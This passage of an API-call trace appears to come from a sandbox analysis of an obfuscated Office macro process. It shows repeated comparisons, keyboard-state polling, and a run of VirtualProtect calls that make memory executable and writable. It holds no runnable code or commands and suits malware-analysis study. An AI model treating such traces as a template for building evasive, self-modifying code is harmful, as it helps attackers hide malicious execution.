pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.913] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.914] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.915] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0113.083] GetAsyncKeyState (vKey=3) returned 0 [0113.315] GetAsyncKeyState (vKey=3) returned 0 [0113.565] GetAsyncKeyState (vKey=3) returned 0 [0113.807] GetAsyncKeyState (vKey=3) returned 0 [0114.035] GetAsyncKeyState (vKey=3) returned 0 [0114.265] GetAsyncKeyState (vKey=3) returned 0 [0114.488] GetAsyncKeyState (vKey=3) returned 0 [0114.712] GetAsyncKeyState (vKey=3) returned 0 [0114.927] GetAsyncKeyState (vKey=3) returned 0 [0115.158] GetAsyncKeyState (vKey=3) returned 0 [0115.392] GetAsyncKeyState (vKey=3) returned 0 [0115.611] GetAsyncKeyState (vKey=3) returned 0 [0115.829] GetAsyncKeyState (vKey=3) returned 0 [0115.899] SafeArrayDestroyData (psa=0xc877b88) returned 0x0 [0115.916] SafeArrayDestroyDescriptor (psa=0xc877b88) returned 0x0 [0115.916] SafeArrayCopy (in: psa=0xc877c78, ppsaOut=0x197c84 | out: ppsaOut=0x197c84) returned 0x0 [0115.960] SafeArrayCopy (in: psa=0xc877b88, ppsaOut=0x197e98 | out: ppsaOut=0x197e98) returned 0x0 [0116.004] SafeArrayCopy (in: psa=0xc877c78, ppsaOut=0x197ff4 | out: ppsaOut=0x197ff4) returned 0x0 [0116.117] GetAsyncKeyState (vKey=3) returned 0 [0116.117] CRetailMalloc_Alloc () returned 0xcb7aca8 [0116.131] memcpy (in: _Dst=0xd015168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0116.131] memcpy (in: _Dst=0xd015270, _Src=0x1978c4, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0116.131] memcpy (in: _Dst=0xd015168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0116.132] memcpy (in: _Dst=0xd015168, _Src=0x1978a4, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0116.142] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x96\x96\x96\x97\x97\x96\x97\x96\x97\x96\x96\x97\x97\x97\x96\x97\x97\x97\x97\x96\x96\x97\x97", cchCount1=-1, lpString2="\x97\x97\x96\x96\x97\x97\x97\x97\x97\x97\x96\x96\x97\x96\x96\x96\x97\x97\x96\x96\x97\x97\x96\x96\x97\x97", cchCount2=-1) returned 1 [0116.142] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x97\x97\x97\x96\x97\x97\x97\x97\x96\x96\x97\x96\x97\x96\x96\x97\x96\x96\x97\x97\x96\x96\x97\x97\x97", cchCount1=-1, lpString2="\x97\x97\x96\x96\x97\x97\x97\x97\x97\x97\x96\x96\x97\x96\x96\x96\x97\x97\x96\x96\x97\x97\x96\x96\x97\x97", cchCount2=-1) returned 1 [0116.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302e62, cbMultiByte=27, lpWideCharStr=0x1976c4, cchWideChar=28 | out: lpWideCharStr="——––——————––—–––——––——––——") returned 27 [0116.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c001a, cbMultiByte=27, lpWideCharStr=0x197724, cchWideChar=28 | out: lpWideCharStr="——––——————––—–––——––——––——") returned 27 [0116.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c001a, cbMultiByte=27, lpWideCharStr=0x197724, cchWideChar=28 | out: lpWideCharStr="——––——————––—–––——––——––——") returned 27 [0116.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c001a, cbMultiByte=27, lpWideCharStr=0x197724, cchWideChar=28 | out: lpWideCharStr="——––——————––—–––——––——––——") returned 27 [0116.145] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x96\x96\x96\x97\x97\x96\x97\x96\x97\x96\x96\x97\x97\x97\x96\x97\x97\x97\x97\x96\x96\x97\x97", cchCount1=-1, lpString2="\x97\x97\x96\x96\x97\x97\x97\x97\x97\x97\x96\x96\x97\x96\x96\x96\x97\x97\x96\x96\x97\x97\x96\x96\x97\x97", cchCount2=-1) returned 1 [0116.145] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x97\x97\x97\x96\x97\x97\x97\x97\x96\x96\x97\x96\x97\x96\x96\x97\x96\x96\x97\x97\x96\x96\x97\x97\x97", cchCount1=-1, lpString2="\x97\x97\x96\x96\x97\x97\x97\x97\x97\x97\x96\x96\x97\x96\x96\x96\x97\x97\x96\x96\x97\x97\x96\x96\x97\x97", cchCount2=-1) returned 1 [0116.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c001a, cbMultiByte=27, lpWideCharStr=0x197724, cchWideChar=28 | out: lpWideCharStr="——––——————––—–––——––——––——") returned 27 [0116.145] CRetailMalloc_Alloc () returned 0xc877b78 [0116.145] _mbscpy_s (in: _Dst=0xc877b78, _DstSizeInBytes=0x1b, _Src=0x112c001a | out: _Dst=0xc877b78) returned 0x0 [0116.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0bee, cbMultiByte=34, lpWideCharStr=0x197734, cchWideChar=35 | out: lpWideCharStr="_B_var_——––——————––—–––——––——––——") returned 34 [0116.146] _mbscpy_s (in: _Dst=0x19779c, _DstSizeInBytes=0x1b, _Src=0x112c001a | out: _Dst=0x19779c) returned 0x0 [0116.146] CRetailMalloc_Free () returned 0x1 [0116.146] memcpy (in: _Dst=0xd015270, _Src=0xd015270, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0116.146] memcpy (in: _Dst=0xd015168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0116.146] memcpy (in: _Dst=0xd01516c, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0116.146] memcpy (in: _Dst=0xd015168, _Src=0x197714, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0116.146] memcpy (in: _Dst=0xd015168, _Src=0x197714, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0116.146] memcpy (in: _Dst=0xd015168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0116.146] memcpy (in: _Dst=0xd015168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0116.146] memcpy (in: _Dst=0xcb7acca, _Src=0x197878, _Size=0x1 | out: _Dst=0xcb7acca) returned 0xcb7acca [0116.147] memcpy (in: _Dst=0xcb7ad20, _Src=0x197944, _Size=0x18 | out: _Dst=0xcb7ad20) returned 0xcb7ad20 [0116.147] CRetailMalloc_Realloc () returned 0xcb7aca8 [0116.147] CRetailMalloc_Free () returned 0x1 [0116.147] GetCurrentProcess () returned 0xffffffff [0116.147] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601714, dwSize=0x14) returned 1 [0116.147] VirtualProtect (in: lpAddress=0xf601714, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.148] GetCurrentProcess () returned 0xffffffff [0116.148] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601715, dwSize=0x2) returned 1 [0116.148] GetCurrentProcess () returned 0xffffffff [0116.148] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601734, dwSize=0x14) returned 1 [0116.148] VirtualProtect (in: lpAddress=0xf601734, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.149] GetCurrentProcess () returned 0xffffffff [0116.149] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601735, dwSize=0x2) returned 1 [0116.149] GetCurrentProcess () returned 0xffffffff [0116.149] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601754, dwSize=0x14) returned 1 [0116.149] VirtualProtect (in: lpAddress=0xf601754, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.149] GetCurrentProcess () returned 0xffffffff [0116.149] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601755, dwSize=0x2) returned 1 [0116.149] GetCurrentProcess () returned 0xffffffff [0116.149] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601774, dwSize=0x14) returned 1 [0116.149] VirtualProtect (in: lpAddress=0xf601774, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.150] GetCurrentProcess () returned 0xffffffff [0116.150] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601775, dwSize=0x2) returned 1 [0116.150] GetCurrentProcess () returned 0xffffffff [0116.150] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601794, dwSize=0x14) returned 1 [0116.150] VirtualProtect (in: lpAddress=0xf601794, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.150] GetCurrentProcess () returned 0xffffffff [0116.150] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601795, dwSize=0x2) returned 1 [0116.150] GetCurrentProcess () returned 0xffffffff [0116.151] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b4, dwSize=0x14) returned 1 [0116.151] VirtualProtect (in: lpAddress=0xf6017b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.151] GetCurrentProcess () returned 0xffffffff [0116.151] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b5, dwSize=0x2) returned 1 [0116.151] GetCurrentProcess () returned 0xffffffff [0116.151] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d4, dwSize=0x14) returned 1 [0116.151] VirtualProtect (in: lpAddress=0xf6017d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.152] GetCurrentProcess () returned 0xffffffff [0116.152] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d5, dwSize=0x2) returned 1 [0116.152] GetCurrentProcess () returned 0xffffffff [0116.152] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f4, dwSize=0x14) returned 1 [0116.152] VirtualProtect (in: lpAddress=0xf6017f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.152] GetCurrentProcess () returned 0xffffffff [0116.152] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f5, dwSize=0x2) returned 1 [0116.152] GetCurrentProcess () returned 0xffffffff [0116.152] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601814, dwSize=0x14) returned 1 [0116.152] VirtualProtect (in: lpAddress=0xf601814, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.153] GetCurrentProcess () returned 0xffffffff [0116.153] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601815, dwSize=0x2) returned 1 [0116.153] GetCurrentProcess () returned 0xffffffff [0116.153] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601834, dwSize=0x14) returned 1 [0116.153] VirtualProtect (in: lpAddress=0xf601834, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.153] GetCurrentProcess () returned 0xffffffff [0116.153] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601835, dwSize=0x2) returned 1 [0116.153] GetCurrentProcess () returned 0xffffffff [0116.153] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601854, dwSize=0x14) returned 1 [0116.153] VirtualProtect (in: lpAddress=0xf601854, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.154] GetCurrentProcess () returned 0xffffffff [0116.154] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601855, dwSize=0x2) returned 1 [0116.154] GetCurrentProcess () returned 0xffffffff [0116.154] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601874, dwSize=0x14) returned 1 [0116.154] VirtualProtect (in: lpAddress=0xf601874, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.154] GetCurrentProcess () returned 0xffffffff [0116.154] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601875, dwSize=0x2) returned 1 [0116.154] GetCurrentProcess () returned 0xffffffff [0116.154] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0048, dwSize=0x14) returned 1 [0116.154] VirtualProtect (in: lpAddress=0xf5d0048, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.155] GetCurrentProcess () returned 0xffffffff [0116.155] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0049, dwSize=0x2) returned 1 [0116.155] GetCurrentProcess () returned 0xffffffff [0116.155] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0068, dwSize=0x14) returned 1 [0116.155] VirtualProtect (in: lpAddress=0xf5d0068, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.156] GetCurrentProcess () returned 0xffffffff [0116.156] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0069, dwSize=0x2) returned 1 [0116.156] GetCurrentProcess () returned 0xffffffff [0116.156] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0088, dwSize=0x14) returned 1 [0116.156] VirtualProtect (in: lpAddress=0xf5d0088, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0116.156] GetCurrentProcess () returned 0xffffffff [0116.156] FlushInstructionCache 